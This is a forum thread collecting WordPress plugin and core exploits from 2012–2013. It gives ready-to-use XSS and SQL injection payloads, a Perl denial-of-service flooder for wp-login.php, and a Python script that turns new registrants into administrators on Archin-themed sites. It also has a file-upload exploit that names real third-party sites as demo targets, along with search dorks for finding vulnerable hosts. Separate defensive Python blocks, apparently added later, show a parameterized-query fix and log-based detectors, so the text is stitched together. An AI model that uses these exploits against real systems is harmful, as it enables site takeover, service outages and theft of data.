
WordPress vulnerabilities

Thread in the section "Vulnerabilities in popular CMSs", created by user onthar, 21 Oct 2009.

  1. Хулиган (forum team, Advanced), likes: 242
    Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities

    Code:
    ##############################################################################
    Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities
    
    author...............: Mehmet Ince
    twitte...............: https://twitter.com/#!/mmetince
    mail.................: mehmet.ince@bga.com.tr
    software link........: http://www.zingiri.com
    affected versions....: tested on 2.3.0 and 2.4.0
    # Exploit Title: Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS
    Vulnerabilities
    # Google Dork:
    # Date: 26 Apr 2012
    # Author: Mehmet INCE
    # Software Link:
    http://downloads.wordpress.org/plugin/zingiri-web-shop.2.4.0.zip
    # Version: 2.4.0 and older.
    # Tested on: version of 2.3.0 and 2.4.0 with Ubuntu 11.10 Server with
    Firefox browser.
    ##############################################################################
    /*
    ## BASIC XSS
    PS: Exploitable without Authentication

    Code:
    plugins/zingiri-web-shop/zing.inc.php
    line at 401.

    Code:
    if ($process=='content' && $page!='ajax' && $page!='downldr') echo '<div class="zing_ws_page" id="zing_ws_'.$_GET['page'].'">';
    Exploit:
    Code:
    http://localhost/wordpress/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    'page' variable isn't properly sanitized before being used.


    ## STORED XSS
    PS: Attacker should be logged for exploit.

    Code:
    ./fws/pages-front/onecheckout.php
    line 27-29

    Code:
    if (!empty($_POST['notes'])) {
    $notes=$_POST['notes'];
    }
    and line 348
    Code:
    <textarea name="notes" rows="5" style="width: 100%"><?php echo
    $notes;?></textarea><br />
    'notes' variable isn't properly sanitized before being used.

    */

    step 1: Login to wordpress.

    step 2: Go to the "Shop" menu. It should be in the banner.


    Code:
    http://6.6.6.102/wordpress/?page_id=14
    step 3: Then you'll see a list of items. Click one of them.

    Code:
    http://6.6.6.102/wordpress/?page=details&prod=2&cat=1&page_id=14
    step 4: You can pass that form action. That won't be a problem..! Click the
    "Order" button.


    step 5: There is a confirmation about the shopping. Click "checkout" to pass
    that page.


    step 6: It's the final stage. Put your JavaScript payload in the "Additional
    comments/questions" form. After you click the checkout button, that form will
    submit all of this input data with the POST method.


    step 7: Click "Checkout"
     
    1 May 2012
    1 person likes this.
  2. Хулиган (forum team, Advanced), likes: 242
    WordPress Download Monitor 3.3.5.4 Cross Site Scripting


    Module: WordPress Download Monitor
    url: http://wordpress.org/extend/plugins/download-monitor/

    EXPLOIT:
    Code:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
    tags="scriptalert(1)/script
    or
    Code:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
    thumbnail="scriptalert(1)/script
    or
    Code:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=downloadss=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
    The bug can be fixed by updating the plugin to the latest version.

    source: http://packetstormsecurity.org/files/112707/wpdownloadmonitor-xss.txt
     
    Last edited: 18 May 2012
    18 May 2012
    1 person likes this.
  3. Hostgame (Newbie), likes: 9
    Code:
    # Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
    # Date: March 31, 2012
    # Author: Ivan Terkin
    # Exploitation: Remote Exploit
    # Bug: Remote SQL Injection
    # Software Link: buddypress.org
    # Version: till 1.5.5
    # Tested on: Buddypress 1.5.4
     
     
    POST /wp-load.php HTTP/1.1
    User-Agent: Mozilla
    Host: example.com
    Accept: */*
    Referer: http://example.com/activity/?s=b
    Connection: Keep-Alive
    Content-Length: 153
    Content-Type: application/x-www-form-urlencoded
     
    action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(  3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14  ),(15),(16),(17))%3b--+
     
    Reported to developers and fixed in version 1.5.5
     
    18 May 2012
    2 users liked this.
  4. Хулиган (forum team, Advanced), likes: 242
    WordPress Website FAQ Plugin v1.0 SQL Injection


    Code:
    # Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
    # Date: 6/25/12
    # Exploit Author: Chris Kellum
    # Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
    # Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
    # Version: 1.0
    Vulnerability location:
    Code:
    /wp-content/plugins/website-faq/website-faq-widget.php
    Code:
    function displayAnswer()
    {
        global $wpdb;
        $master_table = $wpdb->prefix . "faq";
        $category = $_POST['category'];
        $searchtxt = $_POST['searchtxt'];
        if($category!=0)
        {
            $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND  faq_question LIKE '%".$searchtxt."%'";
        }


    Vulnerability Details: faq_category vulnerable to SQL injection

    When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:

    Code:
    action=displayAnswer&category=1&searchtxt=[your query]
    Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.

     
    27 Jun 2012
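The FAQ widget above glues `category` and `searchtxt` straight into the SQL string, which is why `category=1 or 1=1 --` returns every row. The following is an added example, not code from the post or from the plugin: a Python/sqlite3 model of that same query, first written the way the widget writes it, then with the fix a reviewer would ask for (type-check the id, bind both values as parameters). The table rows, the `make_db` helper and the function names are constructed for the demo.

```python
import sqlite3

# Constructed rows standing in for the plugin's <prefix>faq table
FAQ_ROWS = [
    (1, 1, "How do I reset my password?", "Use the 'Lost password' link."),
    (2, 1, "Can I change my username?", "No, usernames are fixed."),
    (3, 2, "Do you ship abroad?", "Yes, to most countries."),
    (4, 3, "How do I cancel an order?", "Contact support within 24 hours."),
]


def make_db():
    """In-memory SQLite database holding the demo FAQ table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE faq (id INTEGER, faq_category INTEGER, faq_question TEXT, faq_answer TEXT)"
    )
    conn.executemany("INSERT INTO faq VALUES (?, ?, ?, ?)", FAQ_ROWS)
    return conn


def display_answer_vulnerable(conn, category, searchtxt):
    """Same shape as the widget's query: both POST fields become part of the SQL text,
    so `1 or 1=1 --` rewrites the WHERE clause and comments out the LIKE condition."""
    sql = ("SELECT * FROM faq WHERE faq_category=" + category +
           " AND faq_question LIKE '%" + searchtxt + "%'")
    return conn.execute(sql).fetchall()


def parse_category(value):
    """The widget expects a numeric category id; anything else is rejected (None).
    The plugin's own `if($category!=0)` tests the value, not its type, so it lets
    `1 or 1=1 --` through."""
    if isinstance(value, str) and value.strip().isdigit():
        return int(value)
    return None


def display_answer_hardened(conn, category, searchtxt):
    """Validate the id first, then bind both values as parameters: the driver passes
    them as data, so SQL syntax inside them is never interpreted. The `%` wildcards
    in searchtxt still work as LIKE wildcards, which is harmless for a search box."""
    category_id = parse_category(category)
    if category_id is None:
        return []  # a real handler would answer 400 here instead of running any query
    sql = "SELECT * FROM faq WHERE faq_category=? AND faq_question LIKE ?"
    return conn.execute(sql, (category_id, "%" + searchtxt + "%")).fetchall()


if __name__ == "__main__":
    db = make_db()
    injected = "1 or 1=1 --"
    print("vulnerable, normal input  :", len(display_answer_vulnerable(db, "1", "password")), "row(s)")
    print("vulnerable, injected id   :", len(display_answer_vulnerable(db, injected, "nothing")), "row(s)")
    print("hardened,   injected id   :", len(display_answer_hardened(db, injected, "nothing")), "row(s)")
```

In the plugin itself the equivalent of the bound query is `$wpdb->prepare()` with a `%d` placeholder for the category id and `%s` for the search text; the point the example makes is that the fix is structural (data never becomes query text), not a blacklist of `or`, `--` or quotes.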
  5. Хулиган (forum team, Advanced), likes: 242
    WordPress AdRotate 3.7.3.5 Cross Site Scripting


    Homepage: http://wordpress.org/extend/plugins/adrotate/

    Vulnerable Module(s):
    [+] Add New
    [+] Manage

    Vulnerable Parameter(s):
    [+] Title

    Proof of Concept:

    Review: adrotateindex title - Listing

    Code:
    <tr id="adrotateindex" class="alternate row_error">
    <th class="check-column"><input name="errorbannercheck[]" value="1" type="checkbox"></th>
    <td><center>1</center></td>
    <td>August 16, 2012</td>
    <td><span style="color: #009900;">November 08, 2012</span></td>
    <td><strong><a class="row-title" href="http://173.0.61.44/video/wp-admin/admin.php?page=adrotate&view=edit&ad=1" title="Edit">"><[PERSISTENT INJECTED SCRIPT CODE!]")'
    <<="" a=""></strong>
    - <a href="http://173.0.61.44/video/wp-admin/admin.php?page=adrotate&amp;view=report&amp;ad=1" title="Report">Report</a></td>
    </tr>
    </tbody>
    </table>
    </form>
    <h3>Active Ads</h3>

    Reference(s):
    Code:
    http://site.com/wp-admin/admin.php?page=adrotate&view=addnew

    Code:
    http://site.com/wp-admin/admin.php?page=adrotate&view=manage
    (c) http://www.vulnerability-lab.com/get_content.php?id=690
     
    8 Sep 2012
    1 person likes this.
  6. Хулиган (forum team, Advanced), likes: 242
    WordPress TDO Mini Forms Arbitrary File Upload


    Code:
    # Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability
    
    # Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index"
    
    # Date: 31/9/12
    
    # Exploit Author: HodLuM
    
    # Vendor Homepage: unknown
    
    # Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/
    
    # Version: All
    
    # Tested on: 2.x.x to 3.x.x
    # Email: h0dlmx@yahoo.com - hodlum@live.com


    Exploit:

    Code:
    site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

    Uploaded files go to:

    Code:
    site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.*
    Demo:
    Code:
    http://waqtnews.tv/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Code:
    http://funnyfuntoosh.com/blogs/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Code:
    http://ideabank.utm.my/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Code:
    http://www.mormonmissionprep.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
     
    10 Sep 2012
  7. Хулиган (forum team, Advanced), likes: 242
    Wordpress Login Page Denial of Service

    Code:
    #!/usr/bin/perl
    #####################################
    # Wordpress Login Page Denial of Service
    # Code Written By Amir
    # Www.IrIsT.Ir
    # Greats : B3HZ4D - nimaarek - Mikili - Dead.Zone - C0dex - TaK.FaNaR - Nafsh
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Wordpress Login Page Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Wordpress\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "action=rp&key=1111111111111111111111111111111111111&login=True";
    $pack.= "POST " .$path. "/wp-login.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "+";
    }
     
    11 Sep 2012
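The script above opens a fresh connection in a tight loop and POSTs the same password-reset form to wp-login.php tens of thousands of times from one client. The added example below is detection code, not part of the post or of the IrIsT script: a sliding-window count of POST requests to wp-login.php per client IP over Apache combined-format access log lines. The request body (`action=rp&key=...`) is not recorded in an access log, so the rule keys on method and path only. The log lines, the client addresses (203.0.113.7, 198.51.100.5) and the threshold of 20 POSTs per 60 s are constructed for the demo; tune the threshold to the site's real login traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined Log Format: client IP, timestamp, request line, status, size, referer, user agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Split one access-log line into its fields; None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def max_in_window(stamps, window_seconds):
    """Largest number of timestamps that fall inside any span of `window_seconds`."""
    stamps = sorted(stamps)
    best = left = 0
    for right, ts in enumerate(stamps):
        while (ts - stamps[left]).total_seconds() > window_seconds:
            left += 1
        best = max(best, right - left + 1)
    return best


def login_floods(lines, threshold=20, window_seconds=60):
    """Map client IP -> peak POST count for clients that POST to wp-login.php more
    than `threshold` times inside any `window_seconds` span."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        # strip any query string, then match the login script regardless of install path
        if rec["path"].split("?", 1)[0].lower().endswith("/wp-login.php"):
            by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in by_ip.items():
        peak = max_in_window(stamps, window_seconds)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


def sample_log():
    """Constructed log: one client replays the loop from the script above (about five
    POSTs per second, Googlebot user agent), another client logs in normally."""
    base = datetime(2012, 9, 11, 10, 0, 0, tzinfo=timezone.utc)

    def fmt(ts):
        return ts.strftime("%d/%b/%Y:%H:%M:%S +0000")

    lines = []
    for i in range(30):
        lines.append('203.0.113.7 - - [%s] "POST /Wordpress/wp-login.php HTTP/1.1" 200 3121 "-" "Googlebot/2.1"'
                     % fmt(base + timedelta(seconds=i // 5)))
    lines.append('198.51.100.5 - - [%s] "GET /wordpress/wp-login.php HTTP/1.1" 200 2870 "-" "Mozilla/5.0"'
                 % fmt(base + timedelta(seconds=40)))
    lines.append('198.51.100.5 - - [%s] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
                 % fmt(base + timedelta(seconds=45)))
    return lines


if __name__ == "__main__":
    for ip, peak in login_floods(sample_log()).items():
        print("flood from %s: %d POSTs to wp-login.php within 60 s" % (ip, peak))
```

The script also sends a `Googlebot/2.1` user agent; a string like that proves nothing on its own, and crawler allow-lists should be keyed on verified reverse DNS of the source address rather than on the header.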
  8. Хулиган (forum team, Advanced), likes: 242
    Wordpress - Multiple XSS Vulnerability

    Code:
    ./Title Exploit : Wordpress - Multiple XSS Vulnerability
    ./CMS Version   : Wordpress v.3.4.2 (Last Version)
    ./WebApps URL   : http://www.wordpress.org/
    ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
    ./Security Risk : [ High Level ]
    ./Category XPL  : [ WebApps/ZeroDay ]
    ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
    ./Time & Date   : September, 17 2012. 10:27 AM. Jakarta, Indonesia.
    Code:
    |||                        -=[ Use It At Your Risk ]=-                        |||
    |||               This Was Written For Educational Purpose Only               |||
    |||               Author Will Be Not Responsible For Any Damage               |||

    [ Information Content ]

    [ Vulnerability Details ]
    • 1.1 Vulnerability XSS WP-Post.
    • 1.2 Vulnerability XSS WP-Page.
    • 1.3 Vulnerability XSS WP-MediaLibrary.

    [ XSS CODE ]
    Code:
    <script>alert('31337');</script>
    <script>alert(document.cookie);</script>
     <script>window.open("http://www.google.com/")</script>
    [ Exploit Report ]

    1.2. Create / Edit WP-Page:

    1.3. Add / Edit WP-Media Library:

    Script XSS will be Affected:
     
    18 Sep 2012
  9. Хулиган (forum team, Advanced), likes: 242
    Code:
    # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
    # Date: Sept 29, 2012
    # Exploit Author: bwall (@bwallHatesTwits)
    # Vendor Homepage: http://themeforest.net/user/wptitans
    # Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
    # Version: 3.2
    # Tested on: Ubuntu
    import httplib, urllib
    
    #target site
    site = "10.10.10.5"
    #path to ajax.php
    url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"
    
    def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
    ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
    ChangeOption(site, url, "users_can_register", "1")
    ChangeOption(site, url, "default_role", "administrator")
    print "Now register a new user, they are an administrator by default!"
     
    2 Oct 2012
  10. Хулиган (forum team, Advanced), likes: 242
    Wordpress spider calendar Plugin Multiple Vulnerabilities

    Code:
    Dork: N/A
     
     Date: [02-10-2012]
     
     Author: Daniel Barragan "D4NB4R"
     
     Twitter: @D4NB4R
     
     Vendor: http://wordpress.org/extend/plugins/spider-calendar/
     
     Version: 1.0.1
     
     License: Non-Commercial
    
     Demo: http://wpdemo.web-dorado.com/spider-calendar/
    
     Download: http://downloads.wordpress.org/plugin/spider-calendar.zip
      
     Tested on: [Linux(bt5)-Windows(7ultimate)]
    
     Especial greetz:  _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt
    Exploit:

    XSS : Cross-site scripting

    Code:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251<ScRiPt >prompt()<%2fScRiPt>&day=01&ev_ids=1&eventID=1&theme_id=5
    Code:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,0x3c7363726970743e616c657274282244344e42345220576173204865726522293c2f7363726970743e,1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=http://127.0.0.1/spider-calendar/

    SQL : SQL injection

    Code:
    http://127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=

    HPP : HTTP Parameter Pollution (HPP)

    Code:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R >> 127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5&d4nb4r=d4nb4r
    source: bugsearch
     
    9 Oct 2012
  11. Хулиган (forum team, Advanced), likes: 242
    Wordpress 3.4 Cross-Site Scripting Vulnerability

    Code:
    #############################
    #
    # Exploit Title : Wordpress 3.4 Cross-Site Scripting Vulnerability
    #
    # Author : IrIsT.Ir
    #
    # Discovered By : Am!r
    #
    # Home : http://IrIsT.Ir/forum/
    #
    # Software Link : http://wordpress.org
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : intext:"Powered By Wordpress"
    #
    #############################
    #
    # Expl0iTs :
    #
    # [Target]/wp-cron.php?doing_wp_cron=[Xss]
    #
    #
    # C0de :
    #
    # $doing_wp_cron = $_GET[ 'doing_wp_cron' ];
    
    #
    #
    #############################
     
    30 Oct 2012
  12. nem1s (rm -rf /*, Advanced), likes: 50
    WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

    [+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS
    [+] Found by Angel Injection
    [+] Version: 1.3.11

    Exploit:

    Code:
    http://localhost/?s=[xss here]&x=0&y=0
     
    http://localhost/?s="><script>alert(1)</script>&x=0&y=0
     
    10 Dec 2012
    1 person likes this.
  13. nem1s (rm -rf /*, Advanced), likes: 50
    Wordpress 3.5 Active XSS

    Administrator rights are required.


    Go to the comments on a post and insert JS code in a comment, for example:

    Code:
    "><script>alert('XSS Test')</script>

    You can test it here.

    Code:
    L: test
    P: test
    (c) n3m1s
     
    Last edited: 18 Dec 2012
    17 Dec 2012
    1 person likes this.
  14. nem1s (rm -rf /*, Advanced), likes: 50
    Wordpress 3.5 Full Path Disclosure

    Exploit:

    Code:
    localhost/?cat[]=1
    Result:

    Code:
    Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
    Vulnerable code:

    Code:
    $q['cat'] = ''.urldecode($q['cat']).'';
    Example:

    Code:
    _tpp://sergeybiryukov.ru/?cat[]=1
    _ttp://wpsymposium.com/?cat[]=1
    Found by n3m1s
     
    Last edited: 18 Dec 2012
    18 Dec 2012
    1 person likes this.
  15. Хулиган (forum team, Advanced), likes: 242
    Code:
    ##############
    # Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection
    #
    # Exploit Author : Ashiyane Digital Security Team
    #
    # Home : ww.ashiyane.org
    #
    # Security Risk : MEdium - SQL Injection
    #
    # Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=
    #
    ##############
    #Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]
    #
    #
    ##############
    #Greetz to: My Lord ALLAH
    ##############
    #
    # Amirh03in
    #
    ##############
    
     
    31 Jan 2013
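Most of the entries in this thread are probes carried in GET parameters: script markup in `page`, `s` or `doing_wp_cron` (posts 1, 11, 12), `union ... select` / `version()` / `--` in `calendar_id` (post 10), an encoded `&` and `=` smuggled into `theme_id` to pollute the parameter list (post 10), PHP array syntax `cat[]` where a scalar is expected (post 14), and plain hits on unauthenticated plugin or theme scripts (posts 6, 9, 15). The added example below is not code from any of the advisories: a Python classifier over combined-format access log lines that tags each request with the probe classes it matches. The sample log lines, the client addresses and the endpoint watch list are constructed for the demo; the regexes are distilled from the payloads quoted above and are heuristics (a value that legitimately contains `=`, such as a redirect URL, will trip the HPP rule), so treat the output as triage input, not a verdict.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined Log Format: only the client IP and the request target are needed here
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+'
)

# Markers distilled from the payloads quoted in this thread
XSS_RE = re.compile(r'<\s*script|"\s*>\s*<|javascript:', re.I)
SQLI_RE = re.compile(
    r'\bunion\b[\s\S]{0,40}?\bselect\b|\bor\s+1\s*=\s*1\b|\bversion\s*\(|--(\s|$)', re.I)
ARRAY_PARAM_RE = re.compile(r'^[\w.-]+\[[^\]]*\]$')   # PHP array syntax, e.g. cat[]

# Plugin/theme scripts named in this thread that accept unauthenticated requests (assumed watch list)
WATCHED_ENDPOINTS = (
    "/tdo-mini-forms/tdomf-upload-inline.php",
    "/archin/hades_framework/option_panel/ajax.php",
    "/RLSWordPressSearch/register.php",
)


def decode_deep(value, rounds=2):
    """parse_qsl strips one layer of percent-encoding; peel up to `rounds` more so a
    double-encoded probe (%253Cscript%253E) is still seen as <script>."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def classify_request(target):
    """Return the set of probe classes found in one request target (path plus query)."""
    parts = urlsplit(target)
    findings = set()
    if parts.path.endswith(WATCHED_ENDPOINTS):
        findings.add("watched-endpoint")
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    names = [name for name, _ in pairs]
    if len(names) != len(set(names)):
        findings.add("hpp")              # the same parameter supplied twice
    for name, raw in pairs:
        value = decode_deep(raw)
        if ARRAY_PARAM_RE.match(name):
            findings.add("array-param")  # scalar expected, array given (the cat[] trick)
        if XSS_RE.search(value):
            findings.add("xss")
        if SQLI_RE.search(value):
            findings.add("sqli")
        if "&" in value or "=" in value:
            findings.add("hpp")          # encoded separator smuggled inside a value
    return findings


def scan_log(lines):
    """(ip, target, sorted findings) for every line that carries at least one marker."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), sorted(findings)))
    return hits


# Constructed sample: one benign search, then probes shaped like the ones quoted in this thread
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Dec/2012:08:01:02 +0000] "GET /?s=wordpress&x=0&y=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:10 +0000] "GET /?s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&x=0&y=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:15 +0000] "GET /wp-cron.php?doing_wp_cron=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:20 +0000] "GET /wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null%20union%20all%20select%201,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:25 +0000] "GET /wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:30 +0000] "GET /?cat[]=1 HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2012:08:01:35 +0000] "GET /wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

POST bodies (the BuddyPress and FAQ widget payloads, the Archin `action=save` request) never reach an access log; catching those needs the application or a WAF to log request bodies, or the server-side fix itself.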
